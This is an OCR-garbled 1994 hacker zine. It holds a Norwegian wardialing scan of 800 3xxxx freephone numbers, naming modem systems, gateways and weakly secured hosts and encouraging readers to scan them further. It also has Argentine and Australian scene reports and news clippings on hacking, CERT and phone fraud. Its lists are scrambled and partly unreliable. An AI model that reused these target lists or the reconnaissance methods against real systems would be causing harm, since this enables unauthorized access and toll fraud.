result in banishment from the Norwegian telephone company (Tele- 
verket) and/or punishment by law. 
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After many sporadic travels over the phone network, in other words scanning 
the number region 800 3xxxx, I’ve come across several interesting things. I 
therefore thought it was in its right place to make a complete list of which 
numbers have a carrier and which have not. The carriers only apply to modems. 
Televerket has (currently) allocated the region 800 30000 to 800 3500 for 
these services. 


hese lines are 100% phreefone, which means that the owner of these services 
pays for the conversation plus a surcharge per unit. This allows for long 
permutations of numbers and passwords without adding to your own phone bill. 
On the other hand, the owner of the line will have a phonebill which equals 
American Express’s. 


Televerket and/or the company/person supplying the service(s) have NO problem 
finding out what the caller’s number is. This is regardless whether or not 
you have filled in the "don’t reveal my number to those I call" part of 
Televerket’s connection form/document. Therefore, nosing around these numbers 
should be done with some care. 


I haven’t tried blueboxing 800 numbers (too much work for something which is 
free in the first place), but theoretically it is possible. [Codex: Would 
this lessen the number identification risk?] 


I had severe difficulties with a number which answered with an 1800Hz tone 
in 1 second, after which it became silent. This box phoned me in intervals 
of 5 minutes from 12:00 the next day -- in other words, an automatic 
WarDial :/. If you discover the same problem, the following solution is 

a guaranteed success: Program your local trunk to send all incoming calls 
to ANOTHER number which answers with an 1800Hz tone. Let this be active an 
hour’s time, and you should be rid of it. 


—- MODEM - 


The list of numbers where modem carriers are commented with a single line. I 
haven’t (at the time of writing) done a deeper investigation of any of the 
services, so none of them should be inactive. 


There are several interesting things -- especially the gateways and the 
X.25 PAD. Please note that the security at most of the systems are pretty 
good. Obscure terminal types, data locks and systems which won’t identify 
themselves are the most common types. Someone has done a good job in making 
t 

p 

q 


he system safe from unauthorized sources. However, as said before, 
hreefone numbers can be exposed to attacks and permutations of zimmering 
uantities. 


When I had a look at the unidentified services, the best way to connect was 
using a raw-mode tty which won’t accept special characters. If you runa 
cooked-mode terminal, the text will becom ven more unreadabl 


-—-— Modem carrier tones 


80030004 —- Data Lock (1) 

80030010 —- *no output* 

80030067 -— *no output* 

80030068 - Courier ASCII Dev. adapter 
80030078 - Courier ASCII Dev. adapter 
80030095 —- Modem Outdial (password) 
80030115 - *no output* 

80030130 - *uknown* 

80030180 - *uknown* 

80030225 - *no output* 

80030301 - *no output* 

80030404 — *unknown* - prompts @ter 
80030456 — *unknown* - terminal 
80030485 -— *unknown* 
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80030456 - Data Lock 4000 (1) 

80030514 - garbage - password 

80030606 —- *no output* 

80031040 - *no output* 

80031065 - *no output* 

80031315 - IBM Aix v3 RISC system/6000 (2) 
80031470 - garbage 

80031490 - Dr V.Furst. Med. Lab 

80031666 - prompts - @ter 

80031815 - prompts - < 

80031920 - *unknown* - password 

80031950 - *unknown* - hangup after 5 seconds 
80032165 - Dr V.Furst. Med. Lab 

80032340 - *uknown* 

80032410 - Wangvs VAX/VMS 

80032470 - *no output* 

80032480 Perle Model 3i V 02.00G - Apotekernes F. Innkj 
80032590 - *unknown* - password 

80032635 -— *unknown* - terminal 

80033338 - TSS Gateway (3) 

80033443 - *no output* 

80033490 - *no output* 

80033580 - *unknown* - hangup after 5 seconds 
80033601 - *no output* 

80033620 - TIU Gateway (3) 

80033720 - *no output* 

80033815 - *unknown* - hangup after 5 seconds 
80033914 - *unknown* dumps lots of texts [Codex: What type?] 
80034248 - *unknown* - prompts for login 
80034866 X.25 PAD 


(1) DATA LOCK 
If someone can get into one of these, he/she can look forward to getting 
a Nobel prize. Data locks are modem front-end protectors, almost 
impossible to crack without physical access. 


(2) IBM AIX 
AIX is one of the best flavors of UNIX there is (even though it was 
made by IBM) -- unfortunately the security at this site was so terrible 


that anyone with a minimal knowledge of UNIX and access to this machine 
could pull it apart blindfolded (making the life really unpleasant for 
the estate agents who own the LAN. Write me for an account ;). 


(3) GATEWAYS 
Fr internet access within grasping distance if you can break through. 
Not easy, but possible. ;) I am already working on it, so I’m not sure 
how long it will take until they increase the security. 


[Codex: Comment about Study-By-Byte removed, as I didn’t know what to call 
the school in English ;). Another fact was that since no number was provided, 
and little seemed to be gained by access to this site anyway, I figured it 
wasn’t too important. Get hold of cyb3rF is you really think it’s needed. ] 


-- End of modem carrier listing 


— VOICE/PBX/FAX - 


Here, ladies and gentlemen, is the list of all the phones in the 800 3xxxx 
region which answer. Which is what, I’1l leave up all you people out there. 
I have mapped some of the list, but won’t spread it [Codex: Yet? ;)]. 


Only one number per line is noted down. This is to easy the job for everyone 
who’s going to (and you will try ;) run these numbers through their scanner 
scripts on the lookout for PBX’s and other oddities. 


Good luck guys! 


cyber aktiF - 01/02/94 
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—- Answering 800 3xxxx services 


80030000 
80030001 
80030002 
80030003 
80030005 
80030006 
80030007 
80030008 
80030009 
80030011 
8003001 
8003001 
8003001 
8003001 
8003001 
8003001 
80030019 
80030022 
80030023 
80030024 
80030025 
80030027 
80030028 
80030029 
80030030 
80030032 
80030033 
80030035 
80030036 
80030037 
80030043 
80030044 
80030045 
80030046 
80030048 
80030050 
80030051 
80030053 
80030055 
80030057 
80030058 
80030060 
80030065 
80030066 
80030070 
80030071 
80030072 
80030073 
80030074 
80030075 
80030077 
80030080 
80030082 
80030088 
80030094 
80030096 
80030097 
80030098 
80030099 
80030100 
80030101 
80030102 
80030103 
80030105 
80030106 


arANA OB ND 
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800301 
800301 
800301 
800301 
800301 
800301 
800301 
800301 
800301 
800301 
800301 
800301 
800301 
800301 
800301 
800301 
800301 
800301 
800301 
800301 
800301 
800301 


10 
11 
13 
14 
16 
20 
Sil: 
36 
40 
44 
51 
3D 
60 
66 
70 
el 
ies) 
77 
89 
90 
99 
99 


80030200 
80030202 
80030203 
80030205 
80030210 
80030211 
80030212 
80030213 
80030215 
80030222 
80030227 
80030230 
80030233 
80030235 
80030239 
80030250 
80030255 
80030258 
80030260 
80030265 
80030270 
80030275 
80030277 
80030288 
80030290 
80030294 
80030295 
80030297 
80030299 
80030300 
80030302 
80030303 
80030305 
80030306 
80030308 
80030310 
80030311 
80030313 
80030315 
80030318 
80030319 
80030322 
80030323 
80030330 
80030333 
80030336 
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80030337 
80030340 
80030344 
80030345 
80030355 
80030360 
80030363 
80030366 
80030377 
80030380 
80030388 
80030390 
80030395 
80030400 
80030401 
80030407 
80030408 
80030411 
80030415 
80030420 
80030422 
80030433 
80030440 
80030445 
80030450 
80030452 
80030466 
80030470 
80030472 
80030475 
80030480 
80030488 
80030490 
80030495 
80030500 
80030501 
80030502 
80030511 
80030520 
80030522 
80030531 
80030540 
80030545 
80030550 
80030555 
80030560 
80030565 
80030566 
80030570 
80030571 
80030580 
80030585 
80030600 
80030601 
80030603 
80030600 
80030601 
80030603 
80030610 
80030616 
88030640 
80030650 
80030666 
80030670 
80030680 
80030683 
80030690 
80030700 
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80030701 
80030707 
80030725 
80030730 
80030750 
80030770 
80030777 
80030788 
80030800 
80030803 
80030811 
80030828 
80030830 
80030840 
80030844 
80030850 
80030855 
80030860 
80030866 
80030870 
80030875 
80030880 
80030888 
80030889 
80030890 
80030900 
80030906 
80030910 
80030911 
80030915 
80030920 
80030922 
80030930 
80030940 
80030950 
80030955 
80030959 
80030960 
80030975 
80030990 
80030994 


80031 
80031 
80031 
80031 
80031 
80031 
80031 
80031 
80031 
80031 
80031 
80031 
80031 
80031 
80031 
80031 
80031 
80031 
80031 
80031 
80031 
80031 
80031 
80031 
80031 
80031 
80031 


000 
001 
006 
007 
008 
010 
020 
030 
031 
043 
044 
048 
O35: 
058 
060 
064 
066 
070 
075 
080 
082 
085 
092 
097 
103 
108 
110 
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800311 
800311 
800311 
800311 
800311 
800311 
800311 
800311 
800311 
800311 
800311 
800311 
800311 
800311 
80031 
80031 
80031 
80031 
80031 
80031 
80031 
80031 
80031 
80031 
80031 
80031 
80031 
80031 
80031 
80031 
80031 
80031 
80031 
80031 
80031 
80031 
80031 
80031 
80031 
80031 
80031 
80031 
80031 
80031 
80031 
80031 
80031 
80031 
80031 
80031 
80031 
80031 
80031 
80031 
80031 
80031 
80031 
80031 
80031 
80031 
80031 
80031 
80031 
80031 
80031 
80031 
80031 
80031 
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80031 
80031 
80031 
80031 
80031 
80031 
80031 
80031 
80031 
80031 
80031 
80031 
80031 
80031 
80031 
80031 
80031 
80031 
80031 
80031 
80031 
80031 
80031 
80031 
80031 
80031 
80031 
80031 
80031 
80031 
80031 
80031 
80031 
80031 
80031 
80031 
80031 
80031 
80031 
80031 
80031 
80031 
80031 
80031 
80031 
80031 
80031 
80031 
80031 


600 
606 
610 
611 
620 
630 
631 
640 
660 
661 
680 
688 
690 
700 
701 
10-7 
713 
717 
740 
760 
777 
780 
800 
801 
809 
811 
820 
830 
831 
833 
840 
850 
851 
866 
880 
888 
900 
907 
919 
927 
937 
947 
957 
958 
959 
970 
994 
995 
999 


80032000 
80032001 
80032002 
80032005 
80032008 
80032011 
80032020 
80032032 
80032040 
80032062 
80032066 
80032080 
80032092 
80032101 
80032105 
80032113 
80032123 
80032130 
80032140 
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800321 
800321 
800321 
800321 
800321 
800321 
800321 


44 
50 
52 
39. 
66 
73 
76 


80032200 
80032202 
80032210 
80032212 
80032220 
80032222 
80032223 
80032225 
80032232 
80032255 
80032280 
80032320 
80032323 
80032325 
80032330 
80032332 
80032333 
80032350 
80032355 
80032383 
80032390 
80032399 


800324 
800324 
800324 
800324 
800324 
800324 
800324 
800324 
800324 
800324 
800324 


800324 


00 
12 
15 
20 
24 
25 
32 
44 
50 
toh) 
60 
66 


80032500 
80032511 
80032520 
80032525 
80032530 
80032540 
80032550 
80032555 
80032560 
80032565 
80032571 
80032578 
80032600 
80032639 
80032660 
80032666 
80032668 
80032680 
80032690 
80032750 
80032754 
80032808 
80032820 
80032832 
80032850 
80032875 
80032880 


Wed Apr 26 09:43:41 2017 


27.txt 


80032899 
80032900 
80032907 
80032927 
80032987 
80032990 
80032997 
80033000 
80033003 
80033011 
80033013 
80033016 
80033300 
80033301 
80033302 
80033303 
80033304 
80033305 
80033306 
80033310 
8003331 
8003331 
8003331 
8003331 
8003331 
80033318 
80033320 
80033321 
80033322 
80033325 
80033330 
80033331 
80033332 
80033333 
80033334 
80033335 
80033341 
80033345 
80033350 
80033353 
80033355 
80033370 
80033372 
80033373 
80033377 
80033380 
80033383 
80033385 
80033394 
80033399 
80033410 
80033411 
80033420 
80033432 
80033433 
80033440 
80033444 
80033445 
80033448 
80033450 
80033455 
80033456 
80033460 
80033466 
80033477 
80033488 
80033499 
80033500 


YToOwntr 
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80033505 
80033510 
80033515 
80033520 
80033535 
80033540 
80033550 
80033555 
80033566 
80033567 
80033570 
80033577 
80033585 
80033590 
80033600 
80033610 
80033611 
80033616 
80033622 
80033626 
80033630 
80033633 
80033644 
80033650 
80033655 
80033660 
80033666 
80033670 
80033678 
80033690 
80033711 
80033717 
80033730 
80033733 
80033740 
80033760 
80033770 
80033775 
80033777 
80033779 
80033780 
80033788 
80033800 
80033808 
80033810 
80033818 
80033820 
80033833 
80033838 
80033840 
80033844 
80033855 
80033856 
80033860 
80033866 
80033880 
80033888 
80033890 
80033899 
80033900 
80033920 
80033930 
80033933 
80033940 
80033950 
80033960 
80033970 
80033977 
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80033980 
80033990 
80033994 
80033999 


80034 
80034 
80034 
80034 
80034 
80034 
80034 
80034 
80034 
80034 
80034 
80034 
80034 
80034 
80034 
80034 
80034 
80034 
80034 
80034 


800341 
800341 
800341 
800341 
800341 
800341 
800341 
800341 
800341 
800341 
800341 
800341 
800341 
800341 
800341 
80034] 


80034 
80034 
80034 
80034 
80034 
80034 
80034 
80034 
80034 
80034 
80034 
80034 
80034 
80034 


80034 


000 
O11 
020 
022 
024 
025 
030 
033 
034 
035 
040 
043 
044 
050 
055 
070 
O77 
080 
088 
090 
00 
10 
11 
15 
23 
25 
34 
35 
40 
44 
50 
55 
60 
66 
70 
L80 
210 
220 
222 
240 
250 
260 
266 
270 
880 
888 
889 
910 
966 
988 
999 


80035000 
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—-- End of list of answering 800 3xxxx services 


This file was brought to you 
ask cyb3rF for permission to 
I also understand that 
(those of you who can’t dial 


mind. 


thought any information, 
English speaking crowd out there. 


Re: cyb3rF, 


Sicko, 


BattleAng, 


and any other people I’v 


in English by Codex/DBA, 26-Apr-1994. I didn’t 
translate this document, but I hope he won’t 
the document is of varied use to some people 
in free to Norway (cc 47), don’t bother), but I 


however useful might be of some interrest to the 


Maelstrom, Uridium, Enigma, Golan, BadS, vale_ 


forgotten to mention right now 


(flame me on 
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#phreak, guys ;). 


I’1l1 be back i 


—-— "Men I hael 


n Norway in June. 


Codex/DBA, 26-Apr-1994. 


vete gutar, vaent paa meg!!" 


More about th 


Argentine Internet scenery. 


It’s difficult to add something to an already good article like Opii’s one, 
but here is some info which may interest you besides what you already know: 


* The local Ne 
for Atomic Pow 


nodes were: ARGCNE (an IBM 9370-60 mainframe), ARGCNEA1 


and ARGCNEA2 ( 


The node ARGCN 


Bitnet. Until 
Chilean node U 
Santiago city, 
if the Chilean 


t started as late as January 1989, when the National Commission 
er (CNEA) connected to the BITNET network. 


Comparex 7/68), all running RSCS V1. Rel 


BA2 was (I think it still is) the main 


The three first 
(IBM/370 158), 
lease3 for data comm. 


link in Argentina to 


late 1992, they still used a manual DIAL-UP LINK (!) to the 
CHCECVM (IBM 4341M02) at the Chile’s National University in 


connecting at 9600 bps to exchange mail 


connection of 


In mid-1990, t 
connected to t 
(Running on IB 
experimental 1 
University. 


Another differ 
Network), whic 
different node 
A 
v 


RPAC connecti 
"international 
have got their 
people around 


While the proj 
US National Sc 
host at the ot 


Well, that’s t 
hings are get 
or "Joe avera 


I’ 


m not sure about 


link is still working, due to the existing new leased lin 


the government’s foreign office. 


he national university of La Plata, joined ranks and also 
he Bitnet network. The two nodes, CESPIVM1 and CESPIVM2 


M mainframes) 


ent beast is what’s called the RAN network 


also served as hosts to a VAX 11-780, anda 
ink to some computers in Uruguay’s (country) 


national 


(National Academic 
h is nothing more than a UUCP network connecting a hundred 

s through the country. Again, until mid-92 they used X.25 

ons (!!EXPENSIVE!!) and manual Dial-up calls(!!) for the 
"connection into UUCO. More recently (two months ago), they 
own 64kbps leased line to the US, which finally will let 


ect was to connect to Maryland University 


the world to mess and GET into our computers 


Po) 3 


(financed by the 


lence Foundation, they love us), I still don’t know what’s the 


her side of the leased lin 


he end of the FACTS that I have... now some political opinions: 
ting a *little* better, but I don’t expect any improvements 


urrent LD and 
ptt 1 1:9.9:9),- th 
oth voice and 
assing throug 
hat is always 


tO OQGQQhMhH 


Until we get A 
rates, and US 
business NOW, 
law. (Or, BTW: 


ge" user, Since to make things work, we must get rid off the 
data monopoly of the two European private telcos that own us. 
y have th xclusive right to use and abuse the market of 

data transmissions, and no competition can enter without 

h their satellite links (and rates). Very nice for a government 


speaking of "free markets". 


T&T and/or MCI competing for the market, 


we 


companies like CIS, Delphi, etc. than could 
will have to wait until late 1999, when the 
or they can talk to Mr. Al Gore, so he can 


beloved presid 


Chileans, inc 
internet links 
even Gopher se 


nt to end the telcos ripoff). 


won’t have affordable 
be doing BIG 
monopoly ends by 

kick a little our 


ontrast, have a lot better scene, with well-established direct 
, an X.25 network with 9600bps access through the country, and 


rvers since a long time ago!. 


Following is a quick and dirty list of Internet domains for both Chile and 


Argentina: 


ARGENTINA: 
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ar.ar (unspecified) 
athea.ar (unspecified) 


atina.ar (united nations development programme, argentina) 


ba.ar (unspecified) 
cbh.ar (unspecified) 


(RAN UUCP HOST) 


com.ar (unspecified) 

edu.ar (unspecified) 

gov.ar (government of argentina) <- give my regards to our corrupt gvt! 
mz.ar (unspecified) 

ncr.ar (national cash register corporation, argentina) 

ng.ar (unspecified) 

org.ar (centro de estudios de poblacion corrientes’,) 

sld.ar (unspecified) 


subdomain.ar (unspecified) 
test.ar (unspecified) 
tf.ar (unspecified) 

tm.ar (unspecified) 


buenosaires.ncr.ar (national cash register corporation, buenos aires, 


city.ar.us (unspecified) 

datage.com.ar (unspecified) 

guti.sld.ar (unspecified) 

secyt.gov.ar (unspecified) 

unisel.com.ar (unspecified) 

unlp.edu.ar (universidad nacional de la plata, argentina) 


arg) 


CHILE: 

altos.cl (altos chile limiteda. el corregidor, santiago, chile) 

apple.cl (axis calderon, santiago, chile) 

ars.cl (ars innovandi (el arte de innovar), chile) 

bei.cl (unspecified) 

campus.cl (indae limiteda. area de computacion, manuel montt, chile) 
cepal.cl (comision economica para america latina (cepal) santiago, chile) 
conicyt.cl (unspecified) < Government education branch 

contag.cl (contagio avda. ricardo lyon, idencia, santiago, chile) 
cronus.cl (familia fuentealba olea, chile) <-- a family with their node! 


difusion.cl (editorial difusion, chile) 
eclac.cl (unspecified) 
epson.cl (epson, chile) 


eso.cl (european southern observatory la silla, la serena, chile) 

frutex.cl (frutexport lota, santiago, chile) 

fundch.cl (fundacion, chile) 

fwells.cl (fundacion wells claro solar, casilla, temuco, chile) 

gob.cl (unspecified) <--- CHILEAN GOVERNMENT! Send a note to Mr. Pinochet! 
ingenac.cl (ingenac pedor de valdivia, idencia, santiago, chile) 

lascar.cl (university of catolica, chile) 

mic.cl (las condes, santiago, chile) 

ner.cl (national cash register corporation, chile) 

opta.cl (opta limiteda. las violetas, idencia, santiago, chile) 

orden.cl (orden huerfanos piso, fax, santiago, chile) 

placer.cl (placer dome) < WHAT IS THIZ??? "Pleasure dome?" !!!!!!rrtl 
puc.cl (catholic university of chile (universidad catolica de chile) 
rimpex.cl (rimpex chile pedro de valdivia, casilla, correo santiago, chile) 
safp.cl (superintendencia de administradoras de fondos de pensiones, chil 
scharfs.cl (scharfstein, las condes, santiago, chile) 

sisteco.cl (sisteco, santiago, chile) 


sonda.cl (sonda digital teatinos, santiago, chile) 
tes.cl (d.c.c. sistemas, chile) 


informatica, ) 


uai.cl (unspecified) 

ubiobio.cl (unspecified) 

uchile.cl (universidad de chile) 

ucv.cl (unspecified) 

udec.cl (universidad de concepcion de ingenieria de sistemas, ) 
unisys.cl (unisys, chile) 

unorte.cl (universidad del norte, antofagasta, chile) 

usach.cl (universidad de santiago de chile de ingenieria 
uta.cl (universidad de tarapaca, arica, chile) 
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utfsm.cl (universidad tecnica de electronica, valparaiso, chile) 

ac.cam.cl (unspecified) 

agr.puc.cl (agriculture department, catholic university of chile 
astro.puc.cl (catholic university of chile (pontificia universidad catolica 


bio.puc.cl (catholic university of chile santiago) 

cec.uchile.cl (universidad de chile) 

cfm.udec.cl (universidad de concepcion, concepcion, chile) 
dec.uchile.cl (department o. de ciencias de la computacion) 
dfi.uchile.cl (universidad de chile) 

die.udec.cl (universidad de concepcion de ingenieria de sistemas) 
dii.uchile.cl (universidad de chile) 

dim.uchile.cl (universidad de chile) 

dis.udec.cl (universidad de concepcion, concepcion, chile) 
disca.utfsm.cl (universidad tecnica federico santa maria, chile) 
dpi.udec.cl (universidad de concepcion de ingenieria de sistemas) 
elo.utfsm.cl (universidad tecnica federico santa maria, ) 
finanzas.fundch.cl (fundacion, chile) 

fis.utfsm.cl (universidad tecnica federico santa maria, ) 
inf.utfsm.cl (universidad tecnica federico santa maria, ) 


ing.puc.cl (engineering, catholic university of chile ) 

mat.puc.cl (mathematics department, catholic university of chile 
mat.utfsm.cl (universidad tecnica federico santa maria, 

qui.puc.cl (catholic university of chile santiago) 

seci.uchile.cl (universidad de chile) 

soft.udec.cl (universidad de concepcion de ingenieria de sistemas, ) 


Australian Scene Report Part II 
by Data King 


This is the sequel to the Australian scene report that appeared in Phrack 
Issue 45. There have been a few developments since I wrote that report which I 
think people may be interested in. 


But first before I deal with what’s new, I need to deal with something that’s 
old. Shortly after Phrack 45 was published, I received a fakemail that 
basically threatened me and also made a lot of claims, I would like to take 
this opportunity to reply to the author of this letter. 


First of all this person claims I have not been in the scene for ages, well 
if I am not in the scene that is news to me! 


The letter contained several threats to do something like redirect my 
telephone number to a 0055 number, for people outside of Australia, a 0055 
is a recorded timed call service. 


To this I say: ’Go ahead, if your capable DO IT!’ 


I wont bother dealing with most of the rubbish contained in the article, it 
was just general BS. 


Finally I have something to say directly to the person who wrote the mail: 
"If your so goddamn good, then don’t hide behind fakemail, come out in the 
open and let us all fear you, come one get your lame ass on IRC and lets talk!" 


Also I was told not to submit anything more to Phrack for publishing or bad 
things would happen, Well I guess either I have no phear, or I don’t take 
these threats seriously. 


New NEWS 


AusCER 


Australia is forming it’s own version of CERT, to be called AusCERT and 
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based in Queensland, Australia. Everybody is shaking in their boots worrying 
-— NOT! 


Networks 
In the last report you may remember I talked about the Australia Military 


Network in a very vague fashion, well now I have some more detailed info for 
you. 


The Australian Defense Forces (ADF) have what they call "the Defense 
Integrated Secure Communications Network (DISCON)". This network is 
relatively new. Circuit switched operations only began in 1990. Packet 
switching came into effect during 1992. 


It provides all the ADF’s communication needs in terms of data, voice, 
video, and so on, secure and non secure communications. 


Main control is exercised from Canberra (believed to be from within the DSD 
compound at Russell Offices), and the network is interconnected via a total 
of 11 ground stations across the country using Aussat. 


Also the Australian Federal Police have an internet connection now. 
sentry.afp.gov.au is the main machine from what I can tell, from the looks 
of it, the machine is either a setup or they don’t know much about security. 


NeuroCon 


There was a Con organized by The Pick held here in Melbourne a little while 
ago, from all reports it was a total disaster, once again showing the apathy 
of Australian people in the scene. 


For Instance the organizers kept the location secret, and where supposed to 
pick people up in the city, at several allocated times they did not show up. 


When one of the potential attendees rang and asked what was going on they 
were told by the organizers: "We are too drunk to come and get you". 


Come on guys this is LAME, sur veryone likes a drink, but if you keep the 
location secret, make sure someone is able to go and get the people waiting 
to be picked up! 


HackFEST 94 


The Year is quickly approaching an end and as yet I have not managed to 

fully organize this event. I am in need of people who wish to speak on various 
topics, so if you are so inclined and have an idea, send me mail and we will 
see what we can organize. 


As always I can be contacted at dking@suburbia.apana.org.au, but please note 
my PGP signature has changed, so please do a finger on the account if you want 
my new PGP signature. 


Information in this article has come from various sources, but they shall 
remain nameless as they do not wish the attention of the AFP. They know who 
they are, and I send them my thanks - Thanks Guys! 
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Damn The Torpedoes June 6, 1994 
by Loring Wirbel (Electronic Engineering Times) (Page 134) 


On May 3, a gargantuan satellite was launched with little press coverage 
from Cape Canaveral. 


The $1.5 billion satellite is a joint project of the NSA and the 
National Reconnaissance Office. At five tons, it is heavy enough to 
have required every bit of thrust its Titan IV launcher could 

provid and despite the boost, it still did enough damage to the 
launch-pad water main to render the facility unusable for two months. 


The satellite is known as Mentor, Jeroboam and Big Bertha, and it has an 
antenna larger than a football field to carry out "hyper-spectral 
analysis" -- Reconnaissance Office buzzwords for real-time analysis of 
communications in a very wide swath of the electromagnetic spectrum. 


Clipper and Digital Signature Standard opponents should be paying 
attention to this one. Mentor surprised space analysts by moving into a 
geostationary rather than geosynchronous orbit. Geostationary orbit 
allows the satellite to "park" over a certain sector of the earth. 


This first satellite in a planned series was heading for the Ural 
Mountains in Russia at last notice. Additional launches planned for 
late 1994 will park future Mentors over the western hemispher 


According to John Pike of the Federation of American Scientists, those 
satellites will likely be controlled from Buckley Field (Aurora, 
Colorado), an NSA/Reconnaissance downlink base slated to become this 
hemisphere’s largest intelligence base in the 1990s. 


[Able to hear a bug fart from space. DC to Daylight realtime analysis. 
And you Clipper whiners cry about someone listening to your phone calls. 
Puh-lease. ] 


Discovery of ’Data Processing Virus Factory’ In Italy February 17, 1994 


AFP Sciences 


It was learned in Rome on 10 February that a data processing virus 
"factory" -- in fact, a program called VCL (Viruses Creation Laboratory), 
capable of triggering a virus epidemic--was discovered in Italy 


Mr. Fulvio Berghella, deputy directory-general of the Italian Institute 
for Bank Data Processing Security (ISTINFORM), discovered what it takes 

to enable just about anybody to fabricate data processing viruses; he told 
the press that its existence had been suspected for a year and a half and 
that about a hundred Italian enterprises had been "contaminated." 


An investigation was launched to try to determine the origin of the program, 
said Mr. Alessandro Pansa, chief of the "data processing crime" section 

of the Italian police. Several copies of VCL were found in various places, 
particularly in Rome and Milan. 
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Producing viruses is very simple with the help of this program, but it is 
not easy to find. A clandestine Bulgarian data bank, as yet not identified, 
reportedly was behind all this. An international meeting of data processing 
virus "hunters" was organized in Amsterdam on 12 February to draft 

a strategy; an international police meeting on this subject will be held 
next week in Sweden. 


Since 1991, the number of viruses in circulation throughout the world 
increased 500% to a total of about 10,000 viruses. In Italy, it is not 
forbidden to own a program of this type, but dissemination of viruses 
is prosecuted. 


[So, I take it Nowhere Man cannot ever travel to Italy?] 


DEFCON TV-News Coverage July 26, 1994 
by Hal Eisner (Real News at 10) (KCOP Channel 13 Los Angeles) 


[Shot of audience] 


Female Newscaster: "Hackers are like frontier outlaws. Look at what Hal 
Eisner found at a gathering of hackers on the Las 
Vegas strip." 


[Shot of "Welcome to Vegas" sign] 
[Shot of Code Thief Deluxe v3.5] 
[Shot of Dark Tangent talking] 


Dark Tangent: "Welcome to the convention!" 


[Shot of Voyager hanging with some people] 


Hal Eisner: "Well not everyone was welcome to this year’s 
Def Con II, a national convention for hackers. 
Certainly federal agents weren’t." 

[Shot DTangent searching for a fed] 

Dark Tangent: "On the right. Getting closer." 


Fed: "Must be me! Thank you." 


[Dark Tangent gives the Fed "I’m a Fed" t-shirt] 


Hail Eisner: "Suspected agents were ridiculed and given 
identifying t-shirts. While conventioneers, some of 
Shot of someone using a laptop] 
which have violated the law, and many of which are 
Shot of some guy reading the DefCon pamphlet] 
simply tech-heads hungry for the latest theory, got 
Shot of a frequency counter, and a scanner] 
to see a lot of the newest gadgetry, and hear some 
tough talk from an Arizona Deputy DA that 
Shot of Gail giving her speech] 
specializes on computer crime and actually 
recognized some of her audience." 


Gail: "Some people are outlaws, crooks, felons maybe." 


[Shot back of conference room. People hanging] 


Hal Eisner: "There was an Alice in Wonderland quality about all 
of this. Hackers by definition go where they are not 
invited, but so is the government that is trying to 
intrude on their privacy." 
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Devlin: "If I want to conceal something for whatever reason. 
I’d like to have the ability to." 


Hal Eisner: "The bottom line is that many of the people her 
want to do what they want, when they want, and how 
they want, without restrictions." 


Deadkat: "What we are doing is changing the system, and if you 
have to break the law to change the system, so be it!" 


Hal Eisner: "That’s from residents of that cyberspacious world 
[Shot of someone holding a diskette with what is supposed to be codez on the 
label] 

of behind the computer screen where the shy can be 
[Code Thief on the background] 

dangerous. Reporting from Las Vegas, Hal Eisner, 

Real News. 


Cyber Cops May 23, 1994 


by Joseph Panettieri (Information Week) (Page 30) 


When Chris Myers, a software engineer at Washington University in 

St. Louis, arrived to work one Monday morning last month, he realized 
something wasn’t quite right. Files had been damaged and a back door 

was left ajar. Not in his office, but on the university’s computer network. 


Like Commissioner Gordon racing to the Batphone, Myers swiftly called the 
Internet’s guardian, the Computer Emergency Response Team (CERT). 


The CERT team boasts impressive credentials. Its 14 team members ar 
managed by Dain Gary, former director of corporate data security at 
Mellon Bank Corp. in Pittsburgh. While Gary is the coach of the CERT 
squad, Moira West is the scrambling on-field quarterback. As manager 
of CERT’s incident-response team and coordination center, she oversees 
the team’s responses to attacks by Internet hackers and its search for 
ways to reduce the Internet’s vulnerabilities. West was formerly a 
software engineer at the University of York in England. 


The rest of the CERT team remains in the shadows. West says 

the CERT crew hails from various information-systems backgrounds, 
but declines to get more specific, possibly to hide any Achilles’ 
heels from hackers. 


One thing West stresses is that CERT isn’t a collection of reformed 
hackers combing the Internet for suspicious data. "People have to 
trust us, so hiring hackers definitely isn’t an option," she says. 
"And we don’t probe or log-on to other people’s systems." 


As a rule, CERT won’t post an alert until after it finds a 

remedy to the problem. But that can take months, giving hackers 
time to attempt similar breakins on thousands of Internet hosts 
without fear of detection. Yet CERT’s West defends this policy: 
"We don’t want to cause mass hysteria if there’s no way to 
address a new, isolated problem. We also don’t want to alert the 
entire intruder community about it." 


Who You Gonna Call? 
How to reach CERT 


Phone: 412-268-7090 

Internet: cert@cert.org 

Fax: 412-268-6989 

Mail: CERT Coordination Center 
Software Engineering Institute 
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Carnegie Mellon University 
Pittsburgh, PA 15213-3890 


[Ask for that saucy British chippie. Her voice will melt you like 
butter. 
CERT -- Continually re-emphasizing the adage: "You get what you pay for!"] 


And remember, CERT doesn’t hire hackers, they just suck the juicy bits 
out of their brains for free. 


Defining the Ethics of Hacking August 12, 1994 


by Amy Harmon (Los Angeles Times) (page Al) 


Eric Corley, a.k.a Emmanuel Goldstein -- patron saint of computer 
hackers and phone phreaks -- is having a party. 


And perhaps it is just in time. 2600, the hacker magazine Corley 
started when he was 23, is a decade old. It has spawned monthly 
hacker meetings in dozens of cities. It has been the target of a 
Secret Service investigation. It has even gone aboveground, with 
newsstand sales of 20,000 last year. 


As hundreds of hackers converge in New York City this weekend to celebrate 
2600’s anniversary, Corley hopes to grapple with how to uphold the 
"hacker ethic," an oxymoron to some, in an era when many of 2600’s devotees 


just want to know how to make free phone calls. (Less high-minded 
activities -- like cracking the New York City subway’s new electronic 
fare card system -- are also on the agenda). 


Hackers counter that in a society increasingly dependent on 

technology, the very basis for democracy could be threatened by limiting 
technological exploration. "Hacking teaches people to think critically about 
technology," says Rop Gonggrijp, a Dutch hacker who will attend the Hackers 
on Planet Earth conference this weekend. "The corporations that are building 
the technology are certainly not going to tell us, because they’re trying to 
sell it to us. Whole societies are trusting technology blindly -- they just 
believe what the technocrats say." 


Gonggrijp, 26, publishes a magazine much like 2600 called Hack-Tic, 

which made waves this year with an article showing that while tapping mobile 
phones of criminal suspects with radio scanners, Dutch police tapped into 
thousand of other mobile phones. 


"What society needs is people who are independent yet knowledgeable," 
Gonggrijp said. ’That’s mostly going to be young people, which society is 
uncomfortable with. But there’s only two groups who know how the phone and 
computer systems work, and that’s engineers and hackers. And I think that’s 
a very healthy situation." 


[By the way Amy: Phrack always grants interviews to cute, female 
LA Times reporters. ] 


Fighting Telephone Fraud August 1, 1994 


by Barbara DePompa (Information Week) (Page 74) 


Local phone companies are taking an active role in warning customers of 
scams and cracking down on hackers. 


Early last month, a 17-year old hacker in Baltimore was caught 
red-handed with a list of more than 100 corporate authorization codes that 
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would have enabled fraud artists to access private branch exchanges and 
make outgoing calls at corporate expanse. 


